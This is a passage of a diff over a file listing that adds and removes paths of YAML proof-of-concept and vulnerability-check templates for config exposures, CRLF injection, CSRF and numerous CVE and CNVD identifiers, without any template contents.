./poc/config/nexus-repo-config-exposure.yml
./poc/config/nexus-repository-exposed-configuration.yaml
@@ -5930,8 +5901,8 @@
./poc/config/nginx-config-9096.yaml
./poc/config/nginx-config-9097.yaml
./poc/config/nginx-config-9098.yaml
+./poc/config/nginx-config-9099.yaml
./poc/config/nginx-config-exposure.yaml
-./poc/config/nginx-config.yaml
./poc/config/nginx_Misconfiguration.yaml
./poc/config/nuclei_esConfig.yaml
./poc/config/om-video-conferencing.yaml
@@ -5942,7 +5913,7 @@
./poc/config/oracle-ebs-config-disclosure.yaml
./poc/config/owncloud-config-9419.yaml
./poc/config/owncloud-config.yaml
-./poc/config/parameters-config-9465.yaml
+./poc/config/parameters-config.yaml
./poc/config/phinx-config.yaml
./poc/config/php-fpm-config-9513.yaml
./poc/config/php-fpm-config-9514.yaml
@@ -5951,10 +5922,10 @@
./poc/config/prod-conf.yaml
./poc/config/proftpd-config-9666.yaml
./poc/config/proftpd-config.yaml
+./poc/config/prometheus-config-9673.yaml
./poc/config/prometheus-config-endpoint-9671.yaml
./poc/config/prometheus-config-endpoint-9672.yaml
./poc/config/prometheus-config-endpoint.yaml
-./poc/config/prometheus-config.yaml
./poc/config/publish-confirm-message-be37091b7b8e5fc7583cd9ff3bba3042.yaml
./poc/config/publish-confirm-message.yaml
./poc/config/rabbitmq-config-exposure.yml
@@ -5979,7 +5950,7 @@
./poc/config/saltstack-config-panel.yaml
./poc/config/samba-config-9985.yaml
./poc/config/samba-config-9986.yaml
-./poc/config/samba-config-9987.yaml
+./poc/config/samba-config.yaml
./poc/config/seeyon-a6-config-disclosure.yaml
./poc/config/server-config-exposure.yaml
./poc/config/sftp-config-exposure.yaml
@@ -5990,8 +5961,8 @@
./poc/config/springboot-autoconfig-1.yaml
./poc/config/springboot-autoconfig-10437.yaml
./poc/config/springboot-autoconfig-2.yaml
-./poc/config/springboot-autoconfig.yaml
./poc/config/springboot-configprops-1.yaml
+./poc/config/springboot-configprops-10442.yaml
./poc/config/springboot-configprops-10443.yaml
./poc/config/springboot-configprops-10444.yaml
./poc/config/springboot-configprops-10445.yaml
@@ -6004,23 +5975,22 @@
./poc/config/svnserve-config.yaml
./poc/config/symfony-database-config-10614.yaml
./poc/config/symfony-database-config-10615.yaml
-./poc/config/symfony-database-config-10616.yaml
-./poc/config/symfony-database-config.yaml
+./poc/config/symfony-database-config-10617.yaml
./poc/config/symfony-security-config-1.yaml
./poc/config/symfony-security-config-2.yaml
./poc/config/tasmota-config-webui.yaml
./poc/config/tcpconfig-10664.yaml
./poc/config/tcpconfig-10665.yaml
./poc/config/tcpconfig-10666.yaml
+./poc/config/tcpconfig.yaml
./poc/config/techbridge-cloud-conference.yaml
./poc/config/tenda-w15e-routercfm-cfg-config-leak.yaml
./poc/config/the-conference-22b4ad0345c7f065a84ce9174ab4fe7e.yaml
./poc/config/the-conference.yaml
./poc/config/truffle-config-exposure.yaml
./poc/config/tugboat-config-exposure-10841.yaml
-./poc/config/tugboat-config-exposure-10842.yaml
+./poc/config/tugboat-config-exposure-10843.yaml
./poc/config/tugboat-config-exposure-10844.yaml
-./poc/config/tugboat-config-exposure.yaml
./poc/config/unconfirmed-abc400f143f0254b15b00169f8369d29.yaml
./poc/config/unconfirmed.yaml
./poc/config/v2-video-conferencing.yaml
@@ -6051,14 +6021,12 @@
./poc/config/videowhisper-video-conference-integration-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/config/videowhisper-video-conference-integration-plugin.yaml
./poc/config/videowhisper-video-conference-integration.yaml
-./poc/config/wamp-server-configuration-11096.yaml
./poc/config/wamp-server-configuration-11097.yaml
./poc/config/wamp-server-configuration-11098.yaml
./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml
./poc/config/wanhu-oa-tele-conference-service-xxe.yaml
./poc/config/web-config-11123.yaml
./poc/config/web-config-11124.yaml
-./poc/config/web-config-11125.yaml
./poc/config/web-config-11126.yaml
./poc/config/web-config-11127.yaml
./poc/config/web-config.yaml
@@ -6081,7 +6049,6 @@
./poc/config/wordpress-accessible-wpconfig-10.yaml
./poc/config/wordpress-accessible-wpconfig-11.yaml
./poc/config/wordpress-accessible-wpconfig-11234.yaml
-./poc/config/wordpress-accessible-wpconfig-11235.yaml
./poc/config/wordpress-accessible-wpconfig-11237.yaml
./poc/config/wordpress-accessible-wpconfig-11238.yaml
./poc/config/wordpress-accessible-wpconfig-11239.yaml
@@ -6104,7 +6071,6 @@
./poc/config/wordpress-accessible-wpconfig.yaml
./poc/config/wordpress-config-disclosure.yaml
./poc/config/wordpress-git-config-1.yaml
-./poc/config/wordpress-git-config-11278.yaml
./poc/config/wordpress-git-config-11279.yaml
./poc/config/wordpress-git-config-2.yaml
./poc/config/wordpress-misconfig.yaml
@@ -6130,12 +6096,11 @@
./poc/config/wpconfig-aws-keys-2.yaml
./poc/config/wpconfig-aws-keys.yaml
./poc/config/wpconfig.yaml
-./poc/config/wpengine-config-check.yaml
./poc/config/wpeprivate-config-disclosure.yaml
./poc/config/ws-config.yaml
./poc/config/yunbox-baolei-config-fastjson-rce.yaml
./poc/config/zend-config-file-11777.yaml
-./poc/config/zend-config-file-11779.yaml
+./poc/config/zend-config-file-11778.yaml
./poc/config/zend-config-file.yaml
./poc/config/zimbra-config-exposure.yml
./poc/cpanel/OFJAAAH-cpanelXSS.yaml
@@ -6148,6 +6113,7 @@
./poc/crlf_injection/crlf-injection-1.yaml
./poc/crlf_injection/crlf-injection-1260.yaml
./poc/crlf_injection/crlf-injection-1261.yaml
+./poc/crlf_injection/crlf-injection-1262.yaml
./poc/crlf_injection/crlf-injection-1263.yaml
./poc/crlf_injection/crlf-injection-1264.yaml
./poc/crlf_injection/crlf-injection-1265.yaml
@@ -6176,8 +6142,8 @@
./poc/cross_site_request_forgery/csrf-token-missing.yaml
./poc/cross_site_request_forgery/csrf.yaml
./poc/cross_site_request_forgery/csrf2.yaml
-./poc/cross_site_request_forgery/csrfguard-detect-1290.yaml
./poc/cross_site_request_forgery/csrfguard-detect-1291.yaml
+./poc/cross_site_request_forgery/csrfguard-detect.yaml
./poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml
./poc/cross_site_request_forgery/drupal_module-cloud-csrf.yaml
./poc/cross_site_request_forgery/hidden-csrf-token.yaml
@@ -6266,6 +6232,7 @@
./poc/cve/CNVD-2021-15822.yaml
./poc/cve/CNVD-2021-15824.yaml
./poc/cve/CNVD-2021-17369.yaml
+./poc/cve/CNVD-2021-26422.yaml
./poc/cve/CNVD-2021-30167-1.yaml
./poc/cve/CNVD-2021-30167-2.yaml
./poc/cve/CNVD-2021-30167.yaml
@@ -12485,6 +12452,7 @@
./poc/cve/CVE-2019-8943.yaml
./poc/cve/CVE-2019-8982.yaml
./poc/cve/CVE-2019-9041.yaml
+./poc/cve/CVE-2019-9082 (copy 2).yaml
./poc/cve/CVE-2019-9082.yaml
./poc/cve/CVE-2019-9168-8538d93dc59d2dac55aa865d48cc9611.yaml
./poc/cve/CVE-2019-9168.yaml
@@ -12540,7 +12508,6 @@
./poc/cve/CVE-2019-9978.yaml
./poc/cve/CVE-2020-0618.yaml
./poc/cve/CVE-2020-0646.yaml
-./poc/cve/CVE-2020-10124 (copy 1).yaml
./poc/cve/CVE-2020-10124.yaml
./poc/cve/CVE-2020-10148 (copy 2).yaml
./poc/cve/CVE-2020-10148.yaml
@@ -17337,6 +17304,7 @@
./poc/cve/CVE-2022-0919.yaml
./poc/cve/CVE-2022-0920-a3427aad6ed07b9d0cef564d7db0125c.yaml
./poc/cve/CVE-2022-0920.yaml
+./poc/cve/CVE-2022-0921.yaml
./poc/cve/CVE-2022-0928.yaml
./poc/cve/CVE-2022-0948-99020965bb89f1929411392421aa5e11.yaml
./poc/cve/CVE-2022-0948.yaml
@@ -25565,6 +25533,7 @@
./poc/cve/CVE-2023-34032.yaml
./poc/cve/CVE-2023-34033-1ebbafba0851b62098503319589fcf92.yaml
./poc/cve/CVE-2023-34033.yaml
+./poc/cve/CVE-2023-34039.yaml
./poc/cve/CVE-2023-3404-b422833eade5f8c090e65b44154f3e9e.yaml
./poc/cve/CVE-2023-3404.yaml
./poc/cve/CVE-2023-3407-46533b3cbb6a8d63a3a806bab7acc70b.yaml
@@ -31385,6 +31354,7 @@
./poc/cve/CVE-2024-1178.yaml
./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml
./poc/cve/CVE-2024-1181.yaml
+./poc/cve/CVE-2024-1183.yaml
./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml
./poc/cve/CVE-2024-1203.yaml
./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml
@@ -34946,6 +34916,7 @@
./poc/cve/CVE-2024-32640.yaml
./poc/cve/CVE-2024-3265-f7037b4d5ba1f01f180fdea2f2f81d6e.yaml
./poc/cve/CVE-2024-3265.yaml
+./poc/cve/CVE-2024-32651.yaml
./poc/cve/CVE-2024-3266-2b13ea444681b03f5c12cb9a9613ae86.yaml
./poc/cve/CVE-2024-3266.yaml
./poc/cve/CVE-2024-3267-84dd6ac30e76a438ef520f1f7b3b7c6e.yaml
@@ -36000,6 +35971,7 @@
./poc/cve/CVE-2024-3565-4c380b36845ecda09785bb681a06a59e.yaml
./poc/cve/CVE-2024-3565.yaml
./poc/cve/CVE-2024-35668-ae50ce1b29ca73379d7c86a29c71520b.yaml
+./poc/cve/CVE-2024-35668.yaml
./poc/cve/CVE-2024-35672-486db9c86df3e8118b4d673efcb7bc70.yaml
./poc/cve/CVE-2024-35672.yaml
./poc/cve/CVE-2024-35673-e1796442c9c94fea31305d80d3cc86c1.yaml
@@ -36096,6 +36068,7 @@
./poc/cve/CVE-2024-3667-f6d21d0de8da3dd348f9b7d2ad61f464.yaml
./poc/cve/CVE-2024-3667.yaml
./poc/cve/CVE-2024-3668-c8ffa38e284a09e692ef63a2e54e8547.yaml
+./poc/cve/CVE-2024-3668.yaml
./poc/cve/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml
./poc/cve/CVE-2024-3670.yaml
./poc/cve/CVE-2024-3671-ad0547b9184ff8fbd7390245f489244d.yaml
@@ -36636,6 +36609,7 @@
./poc/cve/CVE-2024-4463-464edc1eb3da2f9faf49c20859246d3c.yaml
./poc/cve/CVE-2024-4463.yaml
./poc/cve/CVE-2024-4468-e4718b86eead992f27bd617ba2db3191.yaml
+./poc/cve/CVE-2024-4468.yaml
./poc/cve/CVE-2024-4469-da6061bf111a6e16e1ce2e21b77e6884.yaml
./poc/cve/CVE-2024-4469.yaml
./poc/cve/CVE-2024-4470-b43bea79e12b8b0c9f748d9c7ecf554d.yaml
@@ -36741,6 +36715,7 @@
./poc/cve/CVE-2024-4656-a5e8e9e2c51f12bcd24fc196b5414cb9.yaml
./poc/cve/CVE-2024-4656.yaml
./poc/cve/CVE-2024-4661-aa576507b767db894aef4c7b0b19b027.yaml
+./poc/cve/CVE-2024-4661.yaml
./poc/cve/CVE-2024-4662-ab6e1b5977dc25cd02eb75a7c6103282.yaml
./poc/cve/CVE-2024-4662.yaml
./poc/cve/CVE-2024-4666-9132c7c1d96c4459b618f35c7b1deff4.yaml
@@ -36892,9 +36867,11 @@
./poc/cve/CVE-2024-5086-5878d22a233b8390d013118c3ec1a8f6.yaml
./poc/cve/CVE-2024-5086.yaml
./poc/cve/CVE-2024-5087-cdef2f6a63a1cc20224c34166a3e2dbe.yaml
+./poc/cve/CVE-2024-5087.yaml
./poc/cve/CVE-2024-5088-16710672833e29d7b1683a03043820a1.yaml
./poc/cve/CVE-2024-5088.yaml
./poc/cve/CVE-2024-5091-50b2eecb2e1c04b3eff9ad58a7dd3c08.yaml
+./poc/cve/CVE-2024-5091.yaml
./poc/cve/CVE-2024-5092-0f4aaeb58c0f91afc705b391dbdf7872.yaml
./poc/cve/CVE-2024-5092.yaml
./poc/cve/CVE-2024-5141-f003c81bdb67e0c478e1919516cc1594.yaml
@@ -37012,22 +36989,28 @@
./poc/cve/CVE-2024-5612-94c0f75b45145ba79530a3cebd812f91.yaml
./poc/cve/CVE-2024-5612.yaml
./poc/cve/CVE-2024-5613-9198b92debd41a94962756dcf76a3013.yaml
+./poc/cve/CVE-2024-5613.yaml
./poc/cve/CVE-2024-5615-a77f3367ed2460f7ee46222aadc62216.yaml
./poc/cve/CVE-2024-5615.yaml
./poc/cve/CVE-2024-5637-52143d378292b1918b667c9107493dca.yaml
./poc/cve/CVE-2024-5637.yaml
./poc/cve/CVE-2024-5638-6b2bb507df8cc9b0ced9db594103e225.yaml
+./poc/cve/CVE-2024-5638.yaml
./poc/cve/CVE-2024-5640-97926cf22b75d273b8be77e89027662a.yaml
./poc/cve/CVE-2024-5640.yaml
./poc/cve/CVE-2024-5645-1e0813366396dcffd446ea61fbcc4596.yaml
./poc/cve/CVE-2024-5645.yaml
./poc/cve/CVE-2024-5654-745e9ead8e1605f56e0df1bcb3525879.yaml
+./poc/cve/CVE-2024-5654.yaml
./poc/cve/CVE-2024-5656-ed8938bd52fad7e4bf20c235a5cc7800.yaml
./poc/cve/CVE-2024-5656.yaml
./poc/cve/CVE-2024-5663-00dcb12873f526a638405780c6dcbe5f.yaml
+./poc/cve/CVE-2024-5663.yaml
./poc/cve/CVE-2024-5665-fbf91f7b36454225b577032ff6b93e9b.yaml
./poc/cve/CVE-2024-5665.yaml
./poc/cve/CVE-2024-5758-637eadcd24b75860f6993f7f01fc3e2a.yaml
+./poc/cve/CVE-2024-5758.yaml
+./poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml
./poc/cve/CVE_RCE2-1.yaml
./poc/cve/CheckCVE_2021_21972.yaml
./poc/cve/Confluence_CVE-2022-26134.yaml
@@ -37060,65 +37043,64 @@
./poc/cve/cnvd-2018-13393-1038.yaml
./poc/cve/cnvd-2019-01348-1040.yaml
./poc/cve/cnvd-2019-01348-1041.yaml
-./poc/cve/cnvd-2019-01348-1042.yaml
./poc/cve/cnvd-2019-01348-1043.yaml
+./poc/cve/cnvd-2019-01348-1044.yaml
./poc/cve/cnvd-2019-01348-1045.yaml
+./poc/cve/cnvd-2019-06255-1046.yaml
./poc/cve/cnvd-2019-06255-1047.yaml
./poc/cve/cnvd-2019-06255-1048.yaml
./poc/cve/cnvd-2019-06255-1049.yaml
-./poc/cve/cnvd-2019-06255-1050.yaml
./poc/cve/cnvd-2019-19299-1052.yaml
-./poc/cve/cnvd-2019-32204-1054.yaml
+./poc/cve/cnvd-2019-32204-1053.yaml
./poc/cve/cnvd-2020-23735-1056.yaml
./poc/cve/cnvd-2020-23735-1057.yaml
./poc/cve/cnvd-2020-23735-1058.yaml
./poc/cve/cnvd-2020-23735-1059.yaml
./poc/cve/cnvd-2020-46552-1060.yaml
./poc/cve/cnvd-2020-46552.yaml
+./poc/cve/cnvd-2020-56167-1061.yaml
./poc/cve/cnvd-2020-56167-1062.yaml
./poc/cve/cnvd-2020-56167-1063.yaml
-./poc/cve/cnvd-2020-56167-1064.yaml
./poc/cve/cnvd-2020-62422-1065.yaml
./poc/cve/cnvd-2020-62422-1066.yaml
./poc/cve/cnvd-2020-62422-1067.yaml
-./poc/cve/cnvd-2020-62422-1068.yaml
+./poc/cve/cnvd-2020-62422-1069.yaml
./poc/cve/cnvd-2020-67113-1071.yaml
./poc/cve/cnvd-2020-67113-1072.yaml
-./poc/cve/cnvd-2020-68596-1073.yaml
+./poc/cve/cnvd-2020-68596-1074.yaml
./poc/cve/cnvd-2020-68596-1075.yaml
./poc/cve/cnvd-2020-68596-1076.yaml
./poc/cve/cnvd-2021-01931-1077.yaml
+./poc/cve/cnvd-2021-01931-1078.yaml
./poc/cve/cnvd-2021-01931-1079.yaml
./poc/cve/cnvd-2021-09650-1080.yaml
-./poc/cve/cnvd-2021-10543-1082.yaml
./poc/cve/cnvd-2021-10543-1083.yaml
./poc/cve/cnvd-2021-10543-1084.yaml
./poc/cve/cnvd-2021-10543-1085.yaml
./poc/cve/cnvd-2021-10543-1086.yaml
-./poc/cve/cnvd-2021-14536-1088.yaml
-./poc/cve/cnvd-2021-15822-1089.yaml
+./poc/cve/cnvd-2021-14536-1087.yaml
./poc/cve/cnvd-2021-15822-1090.yaml
./poc/cve/cnvd-2021-15822-1091.yaml
./poc/cve/cnvd-2021-15822-1092.yaml
+./poc/cve/cnvd-2021-15822-1093.yaml
./poc/cve/cnvd-2021-15822-1094.yaml
./poc/cve/cnvd-2021-15822-1095.yaml
-./poc/cve/cnvd-2021-15824-1096.yaml
+./poc/cve/cnvd-2021-15824-1097.yaml
./poc/cve/cnvd-2021-17369-1098.yaml
./poc/cve/cnvd-2021-17369-1099.yaml
./poc/cve/cnvd-2021-17369-1101.yaml
./poc/cve/cnvd-2021-17369-1102.yaml
-./poc/cve/cnvd-2021-26422-1103.yaml
./poc/cve/cnvd-2021-26422-1104.yaml
+./poc/cve/cnvd-2021-28277-1105.yaml
./poc/cve/cnvd-2021-28277-1106.yaml
./poc/cve/cnvd-2021-28277-1107.yaml
-./poc/cve/cnvd-2021-30167-1108.yaml
./poc/cve/cnvd-2021-30167-1109.yaml
./poc/cve/cnvd-2021-30167-1110.yaml
./poc/cve/cnvd-2021-30167-1111.yaml
./poc/cve/cnvd-2021-30167-1112.yaml
-./poc/cve/cnvd-2021-49104-1113.yaml
+./poc/cve/cnvd-2021-49104-1114.yaml
./poc/cve/cnvd-2021-49104-1115.yaml
-./poc/cve/cnvd-2022-03672-1117.yaml
+./poc/cve/cnvd-2022-03672-1116.yaml
./poc/cve/coldfusion-cve-2010-2861-lfi.yml
./poc/cve/confluence-cve-2015-8399.yml
./poc/cve/confluence-cve-2019-3396-lfi.yaml
@@ -37131,12 +37113,14 @@
./poc/cve/craftcms-seomatic-cve-2020-9757-rce.yml
./poc/cve/cve-2000-0114-1295.yaml
./poc/cve/cve-2000-0114-1296.yaml
+./poc/cve/cve-2000-0114-1297.yaml
./poc/cve/cve-2001-1473-1298.yaml
./poc/cve/cve-2001-1473-1299.yaml
./poc/cve/cve-2001-1473-1300.yaml
./poc/cve/cve-2002-1131-1301.yaml
./poc/cve/cve-2002-1131-1302.yaml
./poc/cve/cve-2002-1131-1303.yaml
+./poc/cve/cve-2002-1131-1304.yaml
./poc/cve/cve-2004-0519-1305.yaml
./poc/cve/cve-2004-0519-1306.yaml
./poc/cve/cve-2004-0519-1307.yaml
@@ -37173,7 +37157,6 @@
./poc/cve/cve-2007-4504-1339.yaml
./poc/cve/cve-2007-4504-1340.yaml
./poc/cve/cve-2007-4504-1341.yaml
-./poc/cve/cve-2007-4504-1342.yaml
./poc/cve/cve-2007-4556-1343.yaml
./poc/cve/cve-2007-4556-1344.yaml
./poc/cve/cve-2007-4556-1345.yaml
@@ -37229,9 +37212,9 @@
./poc/cve/cve-2008-6222-1395.yaml
./poc/cve/cve-2008-6222-1396.yaml
./poc/cve/cve-2008-6222-1397.yaml
+./poc/cve/cve-2008-6222.yaml
./poc/cve/cve-2008-6668-1398.yaml
./poc/cve/cve-2008-6668-1399.yaml
-./poc/cve/cve-2008-6668-1400.yaml
./poc/cve/cve-2008-6668-1401.yaml
./poc/cve/cve-2009-0545-1402.yaml
./poc/cve/cve-2009-0545-1403.yaml
@@ -37239,6 +37222,7 @@
./poc/cve/cve-2009-0545-1405.yaml
./poc/cve/cve-2009-0545-1406.yaml
./poc/cve/cve-2009-0545-1407.yaml
+./poc/cve/cve-2009-0545.yaml
./poc/cve/cve-2009-0932-1408.yaml
./poc/cve/cve-2009-0932-1409.yaml
./poc/cve/cve-2009-0932-1410.yaml
@@ -37256,7 +37240,6 @@
./poc/cve/cve-2009-1496-1422.yaml
./poc/cve/cve-2009-1496-1423.yaml
./poc/cve/cve-2009-1496-1424.yaml
-./poc/cve/cve-2009-1496.yaml
./poc/cve/cve-2009-1558-1425.yaml
./poc/cve/cve-2009-1558-1426.yaml
./poc/cve/cve-2009-1558-1427.yaml
@@ -37273,12 +37256,10 @@
./poc/cve/cve-2009-2015-1438.yaml
./poc/cve/cve-2009-2015-1439.yaml
./poc/cve/cve-2009-2015-1440.yaml
-./poc/cve/cve-2009-2015-1441.yaml
./poc/cve/cve-2009-2100-1442.yaml
./poc/cve/cve-2009-2100-1443.yaml
./poc/cve/cve-2009-2100-1444.yaml
./poc/cve/cve-2009-2100-1445.yaml
-./poc/cve/cve-2009-2100-1446.yaml
./poc/cve/cve-2009-2100-1447.yaml
./poc/cve/cve-2009-3053-1448.yaml
./poc/cve/cve-2009-3053-1449.yaml
@@ -37286,7 +37267,6 @@
./poc/cve/cve-2009-3053-1451.yaml
./poc/cve/cve-2009-3053-1452.yaml
./poc/cve/cve-2009-3053-1453.yaml
-./poc/cve/cve-2009-3053.yaml
./poc/cve/cve-2009-3318-1454.yaml
./poc/cve/cve-2009-3318-1456.yaml
./poc/cve/cve-2009-3318-1457.yaml
@@ -37347,11 +37327,11 @@
./poc/cve/cve-2010-0943-1515.yaml
./poc/cve/cve-2010-0943-1516.yaml
./poc/cve/cve-2010-0943-1517.yaml
+./poc/cve/cve-2010-0943.yaml
./poc/cve/cve-2010-0944-1518.yaml
./poc/cve/cve-2010-0944-1519.yaml
./poc/cve/cve-2010-0944-1520.yaml
./poc/cve/cve-2010-0944-1521.yaml
-./poc/cve/cve-2010-0972-1522.yaml
./poc/cve/cve-2010-0972-1523.yaml
./poc/cve/cve-2010-0972-1524.yaml
./poc/cve/cve-2010-0972-1525.yaml
@@ -37362,6 +37342,7 @@
./poc/cve/cve-2010-0982-1530.yaml
./poc/cve/cve-2010-0982-1531.yaml
./poc/cve/cve-2010-0982-1532.yaml
+./poc/cve/cve-2010-0982.yaml
./poc/cve/cve-2010-0985-1533.yaml
./poc/cve/cve-2010-0985-1534.yaml
./poc/cve/cve-2010-0985-1535.yaml
@@ -37374,7 +37355,6 @@
./poc/cve/cve-2010-1056-1542.yaml
./poc/cve/cve-2010-1056-1543.yaml
./poc/cve/cve-2010-1056-1544.yaml
-./poc/cve/cve-2010-1056.yaml
./poc/cve/cve-2010-1081-1545.yaml
./poc/cve/cve-2010-1081-1546.yaml
./poc/cve/cve-2010-1081-1547.yaml
@@ -37400,14 +37380,12 @@
./poc/cve/cve-2010-1302-1564.yaml
./poc/cve/cve-2010-1302-1565.yaml
./poc/cve/cve-2010-1302-1566.yaml
-./poc/cve/cve-2010-1302-1567.yaml
./poc/cve/cve-2010-1304-1568.yaml
./poc/cve/cve-2010-1304-1569.yaml
./poc/cve/cve-2010-1304-1570.yaml
./poc/cve/cve-2010-1304-1571.yaml
./poc/cve/cve-2010-1304-1572.yaml
./poc/cve/cve-2010-1304-1573.yaml
-./poc/cve/cve-2010-1305-1574.yaml
./poc/cve/cve-2010-1305-1575.yaml
./poc/cve/cve-2010-1305-1576.yaml
./poc/cve/cve-2010-1305-1577.yaml
@@ -37418,7 +37396,6 @@
./poc/cve/cve-2010-1306-1582.yaml
./poc/cve/cve-2010-1306-1583.yaml
./poc/cve/cve-2010-1306-1584.yaml
-./poc/cve/cve-2010-1307-1585.yaml
./poc/cve/cve-2010-1307-1586.yaml
./poc/cve/cve-2010-1307-1587.yaml
./poc/cve/cve-2010-1307-1588.yaml
@@ -37427,43 +37404,45 @@
./poc/cve/cve-2010-1308-1591.yaml
./poc/cve/cve-2010-1308-1592.yaml
./poc/cve/cve-2010-1308-1593.yaml
-./poc/cve/cve-2010-1308.yaml
./poc/cve/cve-2010-1312-1594.yaml
./poc/cve/cve-2010-1312-1595.yaml
./poc/cve/cve-2010-1312-1596.yaml
./poc/cve/cve-2010-1312-1597.yaml
+./poc/cve/cve-2010-1312-1598.yaml
+./poc/cve/cve-2010-1312.yaml
./poc/cve/cve-2010-1313-1599.yaml
./poc/cve/cve-2010-1313-1600.yaml
./poc/cve/cve-2010-1313-1601.yaml
./poc/cve/cve-2010-1313-1602.yaml
./poc/cve/cve-2010-1313-1603.yaml
+./poc/cve/cve-2010-1313-1604.yaml
./poc/cve/cve-2010-1314-1605.yaml
./poc/cve/cve-2010-1314-1606.yaml
./poc/cve/cve-2010-1314-1607.yaml
./poc/cve/cve-2010-1314-1608.yaml
./poc/cve/cve-2010-1314-1609.yaml
-./poc/cve/cve-2010-1314.yaml
./poc/cve/cve-2010-1315-1610.yaml
./poc/cve/cve-2010-1315-1611.yaml
./poc/cve/cve-2010-1315-1612.yaml
./poc/cve/cve-2010-1315-1613.yaml
./poc/cve/cve-2010-1315-1614.yaml
+./poc/cve/cve-2010-1315.yaml
./poc/cve/cve-2010-1340-1615.yaml
./poc/cve/cve-2010-1340-1616.yaml
./poc/cve/cve-2010-1340-1617.yaml
./poc/cve/cve-2010-1340-1618.yaml
./poc/cve/cve-2010-1340-1619.yaml
./poc/cve/cve-2010-1345-1620.yaml
+./poc/cve/cve-2010-1345-1621.yaml
./poc/cve/cve-2010-1345-1622.yaml
./poc/cve/cve-2010-1345-1623.yaml
./poc/cve/cve-2010-1345-1624.yaml
+./poc/cve/cve-2010-1345.yaml
./poc/cve/cve-2010-1352-1625.yaml
./poc/cve/cve-2010-1352-1626.yaml
./poc/cve/cve-2010-1352-1627.yaml
./poc/cve/cve-2010-1352-1628.yaml
./poc/cve/cve-2010-1352-1629.yaml
-./poc/cve/cve-2010-1352.yaml
-./poc/cve/cve-2010-1353-1630.yaml
./poc/cve/cve-2010-1353-1631.yaml
./poc/cve/cve-2010-1353-1632.yaml
./poc/cve/cve-2010-1353-1633.yaml
@@ -37482,9 +37461,11 @@
./poc/cve/cve-2010-1469-1647.yaml
./poc/cve/cve-2010-1469-1648.yaml
./poc/cve/cve-2010-1469-1649.yaml
+./poc/cve/cve-2010-1469.yaml
./poc/cve/cve-2010-1470-1650.yaml
./poc/cve/cve-2010-1470-1651.yaml
./poc/cve/cve-2010-1470-1652.yaml
+./poc/cve/cve-2010-1470-1653.yaml
./poc/cve/cve-2010-1470-1654.yaml
./poc/cve/cve-2010-1471-1655.yaml
./poc/cve/cve-2010-1471-1656.yaml
@@ -37506,7 +37487,6 @@
./poc/cve/cve-2010-1474-1671.yaml
./poc/cve/cve-2010-1474-1672.yaml
./poc/cve/cve-2010-1474-1673.yaml
-./poc/cve/cve-2010-1474.yaml
./poc/cve/cve-2010-1475-1674.yaml
./poc/cve/cve-2010-1475-1675.yaml
./poc/cve/cve-2010-1475-1676.yaml
@@ -37526,12 +37506,12 @@
./poc/cve/cve-2010-1491-1691.yaml
./poc/cve/cve-2010-1491-1692.yaml
./poc/cve/cve-2010-1491-1693.yaml
-./poc/cve/cve-2010-1491.yaml
./poc/cve/cve-2010-1494-1694.yaml
./poc/cve/cve-2010-1494-1695.yaml
./poc/cve/cve-2010-1494-1696.yaml
./poc/cve/cve-2010-1494-1697.yaml
./poc/cve/cve-2010-1494-1698.yaml
+./poc/cve/cve-2010-1494.yaml
./poc/cve/cve-2010-1495-1699.yaml
./poc/cve/cve-2010-1495-1700.yaml
./poc/cve/cve-2010-1495-1701.yaml
@@ -37546,7 +37526,6 @@
./poc/cve/cve-2010-1532-1710.yaml
./poc/cve/cve-2010-1532-1711.yaml
./poc/cve/cve-2010-1532-1712.yaml
-./poc/cve/cve-2010-1532.yaml
./poc/cve/cve-2010-1533-1713.yaml
./poc/cve/cve-2010-1533-1714.yaml
./poc/cve/cve-2010-1533-1715.yaml
@@ -37563,7 +37542,6 @@
./poc/cve/cve-2010-1535-1726.yaml
./poc/cve/cve-2010-1535-1727.yaml
./poc/cve/cve-2010-1535-1728.yaml
-./poc/cve/cve-2010-1540-1729.yaml
./poc/cve/cve-2010-1540-1730.yaml
./poc/cve/cve-2010-1540-1731.yaml
./poc/cve/cve-2010-1540-1732.yaml
@@ -37596,34 +37574,33 @@
./poc/cve/cve-2010-1653-1757.yaml
./poc/cve/cve-2010-1653-1758.yaml
./poc/cve/cve-2010-1657-1760.yaml
-./poc/cve/cve-2010-1657-1761.yaml
./poc/cve/cve-2010-1657-1762.yaml
./poc/cve/cve-2010-1657-1763.yaml
./poc/cve/cve-2010-1657-1764.yaml
+./poc/cve/cve-2010-1658-1765.yaml
./poc/cve/cve-2010-1658-1766.yaml
./poc/cve/cve-2010-1658-1767.yaml
./poc/cve/cve-2010-1658-1768.yaml
./poc/cve/cve-2010-1658-1769.yaml
+./poc/cve/cve-2010-1658.yaml
./poc/cve/cve-2010-1659-1770.yaml
./poc/cve/cve-2010-1659-1771.yaml
./poc/cve/cve-2010-1659-1772.yaml
-./poc/cve/cve-2010-1659-1773.yaml
./poc/cve/cve-2010-1659-1774.yaml
./poc/cve/cve-2010-1714-1775.yaml
./poc/cve/cve-2010-1714-1776.yaml
./poc/cve/cve-2010-1714-1777.yaml
./poc/cve/cve-2010-1714-1778.yaml
+./poc/cve/cve-2010-1714-1779.yaml
./poc/cve/cve-2010-1715-1780.yaml
./poc/cve/cve-2010-1715-1781.yaml
./poc/cve/cve-2010-1715-1782.yaml
./poc/cve/cve-2010-1715-1783.yaml
./poc/cve/cve-2010-1715-1784.yaml
./poc/cve/cve-2010-1715-1785.yaml
-./poc/cve/cve-2010-1715.yaml
./poc/cve/cve-2010-1717-1786.yaml
./poc/cve/cve-2010-1717-1787.yaml
./poc/cve/cve-2010-1717-1788.yaml
-./poc/cve/cve-2010-1717-1789.yaml
./poc/cve/cve-2010-1717-1790.yaml
./poc/cve/cve-2010-1718-1791.yaml
./poc/cve/cve-2010-1718-1792.yaml
@@ -37631,7 +37608,6 @@
./poc/cve/cve-2010-1718-1794.yaml
./poc/cve/cve-2010-1718-1795.yaml
./poc/cve/cve-2010-1718-1796.yaml
-./poc/cve/cve-2010-1718.yaml
./poc/cve/cve-2010-1719-1797.yaml
./poc/cve/cve-2010-1719-1798.yaml
